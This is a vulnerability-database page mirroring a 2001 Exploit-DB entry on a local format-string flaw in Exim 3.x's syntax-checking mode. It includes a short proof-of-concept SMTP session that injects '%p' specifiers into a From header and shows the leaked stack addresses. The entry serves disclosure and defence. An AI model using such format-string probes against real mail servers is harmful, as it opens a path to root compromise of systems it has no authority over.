Lucene search
+L

Exim 3.x - Format String

🗓️ 06 Jun 2001 00:00:00Reported by Megyer LaszloType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Exim 3.x vulnerable to format string attack with root access if syntax checking is enabled.

Related
Code
ReporterTitlePublishedViews
Family
gitee
Gitee
Exploit for CVE-1999-0078
3 Aug 202504:29
gitee
cve
CVE
CVE-2001-0690
9 Mar 200205:00
cve
cvelist
Cvelist
CVE-2001-0690
9 Mar 200205:00
cvelist
nessus
Tenable Nessus
Debian DSA-058-1 : exim - local printf format attack
29 Sep 200400:00
nessus
nvd
NVD
CVE-2001-0690
20 Sep 200104:00
nvd
openvas
OpenVAS
Debian Security Advisory DSA 058-1 (exim)
17 Jan 200800:00
openvas
openvas
OpenVAS
Debian Security Advisory DSA 058-1 (exim)
17 Jan 200800:00
openvas
vulncheck_kev
VulnCheck KEV
VulnCheck KEV: CVE-2001-0690
20 Jun 201700:00
vulncheck_kev
source: https://www.securityfocus.com/bid/2828/info

Exim is a free, open-source Mail Transfer Agent for Unix systems.

Exim is vulnerable to a locally exploitable format string attack which may compromise root access. The vulnerability exists only when the 'syntax checking' mode is turned on, which it is not by default.

The vulnerability has to do with handling of the hostname string in an email address argumenting the 'From:' field. If the syntax checking is enabled, then this vulnerability can be exploited to execute arbitrary code with root priviliges.

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.11891
33